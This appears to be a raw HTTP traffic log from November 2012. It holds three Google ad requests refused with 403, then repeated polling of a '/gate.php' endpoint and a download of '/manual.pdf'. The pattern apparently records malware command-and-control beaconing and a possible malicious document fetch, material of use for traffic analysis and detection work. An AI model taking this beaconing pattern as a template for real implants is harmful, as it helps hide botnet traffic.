GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=3914615204&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076724&bpp=3&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=3216236652&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=500&biw=1159&bih=778&eid=39482000&oid=3&fu=0&ifi=4&dtd=630&xpc=U29PBLBGgm&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=3914615204&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076724&bpp=3&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824&correlator=1352339076716&frm=20&adk=3216236652&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=500&biw=1159&bih=778&eid=39482000&oid=3&fu=0&ifi=4&dtd=630&xpc=U29PBLBGgm&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=2612022508&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076842&bpp=8&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204&correlator=1352339076716&frm=20&adk=1583532706&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=1594&biw=1159&bih=778&oid=3&fu=0&ifi=5&dtd=766&xpc=Bsu5NYUYfg&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=60&slotname=2612022508&w=468&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076842&bpp=8&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204&correlator=1352339076716&frm=20&adk=1583532706&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=390&ady=1594&biw=1159&bih=778&oid=3&fu=0&ifi=5&dtd=766&xpc=Bsu5NYUYfg&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=600&slotname=2264561644&w=120&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076988&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204%2C2612022508&correlator=1352339076716&frm=20&adk=4201446564&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=869&ady=379&biw=1159&bih=778&oid=3&fu=0&ifi=6&dtd=716&xpc=hY0BPbgU0a&p=http%3A//www.indiansites.in HTTP/1.1 GET /pagead/ads?client=ca-pub-8412828530142307&output=html&h=600&slotname=2264561644&w=120&lmt=1352339075&flash=10.0.45&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&dt=1352339076988&bpp=4&shv=r20121031&jsv=r20110914&prev_slotnames=2367292824%2C2367292824%2C2367292824%2C3914615204%2C2612022508&correlator=1352339076716&frm=20&adk=4201446564&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=869&ady=379&biw=1159&bih=778&oid=3&fu=0&ifi=6&dtd=716&xpc=hY0BPbgU0a&p=http%3A//www.indiansites.in HTTP/1.1 | HTTP/1.1 403 Forbidden P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:36 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:38 GMT |
GET /favicon.ico HTTP/1.1
| HTTP/1.1 200 OK Cache-Control: no-cache |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:40 GMT |
GET /manual.pdf HTTP/1.1
| HTTP/1.1 200 OK Server: nginx/1.2.4 |
GET /manual.pdf HTTP/1.1
| HTTP/1.1 206 Partial Content Server: nginx/1.2.4 |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:48 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:50 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:55 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:56 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:57 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:58 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:44:59 GMT |
GET /gate.php HTTP/1.1
| HTTP/1.1 200 OK Date: Thu, 08 Nov 2012 01:45:00 GMT |
